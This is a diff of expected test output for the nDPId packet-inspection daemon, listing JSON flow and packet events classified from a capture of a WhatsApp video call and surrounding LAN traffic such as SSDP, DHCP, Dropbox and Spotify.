+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1470,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455791449,"flow_last_seen":1561455791449,"flow_idle_time":180000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"ts_msec":1561455791449,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1471,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1561455791449,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"ts_msec":1561455791449,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAFvmCUAAEARWwjAqAIBwKgC\/0RcRFwBW7HJeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxNzQ1NjcxOTM5MjIwMTQ2OTg4Njg4NzAzNTEyMjAyNTg3OTI0NDMsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsxMTgyMzk1NTczLCAxNDIxMTE0Mzk5LCAxODA4MDQ3NjgwLCAxMzcyMDkyNjA5LCAxMjUyMTE2NDI5LCA5OTQ2OTc3MywgNTI1ODAwNzEyMCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNDUxNDcyNjU4LCA0MTc0NjUwODgwLCAyODUyMTYwNywgMTQxNTYyMDM1MF19"}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1537,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455792270,"flow_last_seen":1561455792270,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455792270,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":65025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1537,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1561455792270,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1561455792270,"pkt":"AQBef\/\/6kLkxKPrKCABFAAClb\/UAAAIRlaTAqAIM7\/\/\/+v4BB2wAkbTRTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1537,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455792270,"flow_last_seen":1561455792270,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455792270,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":65025,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1537,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455792270,"flow_last_seen":1561455792270,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455792270,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":65025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1543,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455792273,"flow_last_seen":1561455792273,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455792273,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51458,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1543,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1561455792273,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1561455792273,"pkt":"AQBef\/\/6kLkxKPrKCABFAACleZoAAAIRi\/\/AqAIM7\/\/\/+skCB2wAkenQTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1543,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455792273,"flow_last_seen":1561455792273,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455792273,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51458,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1543,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455792273,"flow_last_seen":1561455792273,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455792273,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51458,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1563,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1561455795276,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"ts_msec":1561455795276,"pkt":"AQBef\/\/6kLkxKPrKCABFAACgOnoAAAIRyyTAqAIM7\/\/\/+skCB2wAjBoITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTklQQ29ubmVjdGlvbjoxDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KTVg6IDMNCg0K"}
 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1564,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1561455795277,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"ts_msec":1561455795277,"pkt":"AQBef\/\/6kLkxKPrKCABFAACg4VAAAAIRJE7AqAIM7\/\/\/+v4BB2wAjOUITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTklQQ29ubmVjdGlvbjoxDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KTVg6IDMNCg0K"}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455770313,"flow_last_seen":1561455779337,"flow_idle_time":180000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":125,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51277,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455772049,"flow_last_seen":1561455780246,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1561455769791,"flow_last_seen":1561455792270,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455769790,"flow_last_seen":1561455792270,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":422,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455792273,"flow_last_seen":1561455795276,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":134,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51458,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455791449,"flow_last_seen":1561455791449,"flow_idle_time":180000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":340,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455764448,"flow_last_seen":1561455764448,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455769790,"flow_last_seen":1561455792270,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":422,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455769789,"flow_last_seen":1561455792270,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":422,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":493,"flow_first_seen":1561455769789,"flow_last_seen":1561455792270,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":1139,"flow_tot_l4_payload_len":227969,"flow_avg_l4_payload_len":462,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455792270,"flow_last_seen":1561455795277,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":134,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":65025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":893,"flow_first_seen":1561455781352,"flow_last_seen":1561455792065,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":1293,"flow_tot_l4_payload_len":647331,"flow_avg_l4_payload_len":724,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","src_port":53688,"dst_port":32641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1561455767339,"flow_last_seen":1561455795283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":88,"midstream":1,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
-00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1561455781247,"flow_last_seen":1561455791996,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":792,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":53688,"dst_port":59491,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455770313,"flow_last_seen":1561455779337,"flow_idle_time":180000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":125,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51277,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455772049,"flow_last_seen":1561455780246,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1561455769791,"flow_last_seen":1561455792270,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455769790,"flow_last_seen":1561455792270,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":422,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455792273,"flow_last_seen":1561455795276,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":134,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51458,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455791449,"flow_last_seen":1561455791449,"flow_idle_time":180000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":340,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455764448,"flow_last_seen":1561455764448,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455769790,"flow_last_seen":1561455792270,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":422,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455769789,"flow_last_seen":1561455792270,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":422,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":493,"flow_first_seen":1561455769789,"flow_last_seen":1561455792270,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":1139,"flow_tot_l4_payload_len":227969,"flow_avg_l4_payload_len":462,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455792270,"flow_last_seen":1561455795277,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":134,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":65025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":893,"flow_first_seen":1561455781352,"flow_last_seen":1561455792065,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":1293,"flow_tot_l4_payload_len":647331,"flow_avg_l4_payload_len":724,"midstream":0,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","src_port":53688,"dst_port":32641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1561455767339,"flow_last_seen":1561455795283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":88,"midstream":1,"ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
